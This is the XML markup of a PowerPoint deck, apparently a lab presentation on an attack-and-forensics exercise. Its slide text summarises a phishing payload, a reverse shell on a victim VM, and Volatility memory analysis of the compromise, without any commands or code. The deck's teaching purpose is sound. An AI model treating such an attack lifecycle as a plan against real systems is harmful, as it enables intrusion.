            <a:chExt cx="1493213" cy="12112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3213" cy="1211215"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1493213" h="1211215">
                  <a:moveTo>
                    <a:pt x="34138" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1459075" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1477929" y="0"/>
                    <a:pt x="1493213" y="15284"/>
                    <a:pt x="1493213" y="34138"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1493213" y="1177077"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1493213" y="1195931"/>
                    <a:pt x="1477929" y="1211215"/>
                    <a:pt x="1459075" y="1211215"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="34138" y="1211215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="25084" y="1211215"/>
                    <a:pt x="16401" y="1207619"/>
                    <a:pt x="9999" y="1201217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3597" y="1194814"/>
                    <a:pt x="0" y="1186131"/>
                    <a:pt x="0" y="1177077"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="34138"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="15284"/>
                    <a:pt x="15284" y="0"/>
                    <a:pt x="341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493213" cy="1239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0122767" y="6603109"/>
            <a:ext cx="385535" cy="385535"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="385535" h="385535">
                <a:moveTo>
                  <a:pt x="385535" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="385535"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385535" y="385535"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3855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651367" y="2719194"/>
            <a:ext cx="6994776" cy="4198264"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6350000" cy="38112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10"/>
              <a:stretch>
                <a:fillRect t="-5502" b="-550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50974" y="7692136"/>
            <a:ext cx="8608326" cy="85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5840" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3131"/>
                </a:solidFill>
                <a:latin typeface="Aperture"/>
                <a:ea typeface="Aperture"/>
                <a:cs typeface="Aperture"/>
                <a:sym typeface="Aperture"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5840" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F06856"/>
                </a:solidFill>
                <a:latin typeface="Aperture"/>
                <a:ea typeface="Aperture"/>
                <a:cs typeface="Aperture"/>
                <a:sym typeface="Aperture"/>
              </a:rPr>
              <a:t>KEY FINDINGS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0043" y="6286242"/>
            <a:ext cx="5194225" cy="365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864" lvl="1" indent="-186432" algn="l">
              <a:lnSpc>
                <a:spcPts val="2417"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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Phishing payload successfully bypassed user defenses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="372864" lvl="1" indent="-186432" algn="l">
              <a:lnSpc>
                <a:spcPts val="2417"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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Reverse shell provided full control of the victim system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="372864" lvl="1" indent="-186432" algn="l">
              <a:lnSpc>
                <a:spcPts val="2417"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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Volatility detected:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="745728" lvl="2" indent="-248576" algn="l">
              <a:lnSpc>
                <a:spcPts val="2417"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="⚬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Suspicious process tree</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="745728" lvl="2" indent="-248576" algn="l">
              <a:lnSpc>
                <a:spcPts val="2417"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="⚬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Lack of command traces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="745728" lvl="2" indent="-248576" algn="l">
              <a:lnSpc>
                <a:spcPts val="2417"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="⚬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Malicious memory injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="372864" lvl="1" indent="-186432" algn="l">
              <a:lnSpc>
                <a:spcPts val="2417"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="172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Clear indicators of compromise visible in RAM snapshot.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2417"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="172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417"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="172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1651367" y="2719194"/>
            <a:ext cx="1131527" cy="113152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924207" y="2955494"/>
            <a:ext cx="585847" cy="658928"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="585847" h="658928">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="585847" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="585847" y="658928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="658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13317" y="2192645"/>
            <a:ext cx="5783473" cy="8448270"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1523219" cy="2225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219" cy="2225059"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1523219" h="2225059">
                  <a:moveTo>
                    <a:pt x="33466" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1489754" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1498629" y="0"/>
                    <a:pt x="1507141" y="3526"/>
                    <a:pt x="1513417" y="9802"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1519693" y="16078"/>
                    <a:pt x="1523219" y="24590"/>
                    <a:pt x="1523219" y="33466"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1523219" y="2191593"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1523219" y="2210076"/>
                    <a:pt x="1508236" y="2225059"/>
                    <a:pt x="1489754" y="2225059"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="33466" y="2225059"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="24590" y="2225059"/>
                    <a:pt x="16078" y="2221533"/>
                    <a:pt x="9802" y="2215257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3526" y="2208981"/>
                    <a:pt x="0" y="2200469"/>
                    <a:pt x="0" y="2191593"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="33466"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="24590"/>
                    <a:pt x="3526" y="16078"/>
                    <a:pt x="9802" y="9802"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16078" y="3526"/>
                    <a:pt x="24590" y="0"/>
                    <a:pt x="33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23219" cy="2253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69799" y="2192645"/>
            <a:ext cx="4196999" cy="7065655"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="37719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7"/>
              <a:stretch>
                <a:fillRect l="-76103" r="-7610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239816" y="8126773"/>
            <a:ext cx="1131527" cy="113152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512656" y="8363073"/>
            <a:ext cx="585847" cy="658928"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="585847" h="658928">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="585847" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="585847" y="658928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="658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581957" y="3395218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423210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41553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59897" y="425558"/>
            <a:ext cx="90720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44427" y="2240270"/>
            <a:ext cx="6645344" cy="93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8"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6453" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEBD48"/>
                </a:solidFill>
                <a:latin typeface="Aperture"/>
                <a:ea typeface="Aperture"/>
                <a:cs typeface="Aperture"/>
                <a:sym typeface="Aperture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58167" y="2949783"/>
            <a:ext cx="3893773" cy="554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2"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1796" i="1">
                <a:solidFill>
                  <a:srgbClr val="FF3131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CONCLUSION AND LEARNING OUTCOMES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89242" y="3666903"/>
            <a:ext cx="4831623" cy="669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062" lvl="1" indent="-187531" algn="l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Successfully demonstrated how attackers operate and how forensic analysts can respond.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="375062" lvl="1" indent="-187531" algn="l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Memory forensics remains crucial in post-breach scenarios.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="375062" lvl="1" indent="-187531" algn="l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Reinforced the importance of fast RAM capture to preserve volatile evidence.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="375062" lvl="1" indent="-187531" algn="l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Tools like Volatility help attribute, trace, and reconstruct attacks effectively.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="375062" lvl="1" indent="-187531" algn="l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Gained exposure to offensive security tactics and forensic countermeasures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="375062" lvl="1" indent="-187531" algn="l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Built confidence in handling VMs, configuring networks, and launching payloads.</a:t>
            </a:r>
          </a:p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Acquired practical skills in:</a:t>
            </a:r>
          </a:p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Creating payloads </a:t>
            </a:r>
          </a:p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Establishing sessions</a:t>
            </a:r>
          </a:p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Dumping and analyzing RAM</a:t>
            </a:r>
          </a:p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Understood cyberattack lifecycle from infection to investigation.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  <a:endParaRPr lang="en-US" sz="173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432"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="173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432"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="173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479</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom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 World Italics</vt:lpstr>
      <vt:lpstr>Aperture</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Helvetica World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</dc:title>
  <cp:lastModifiedBy>Microsoft account</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-01T20:36:51Z</dcterms:modified>
  <dc:identifier>DAGr8y_SO4s</dc:identifier>
</cp:coreProperties>
</file>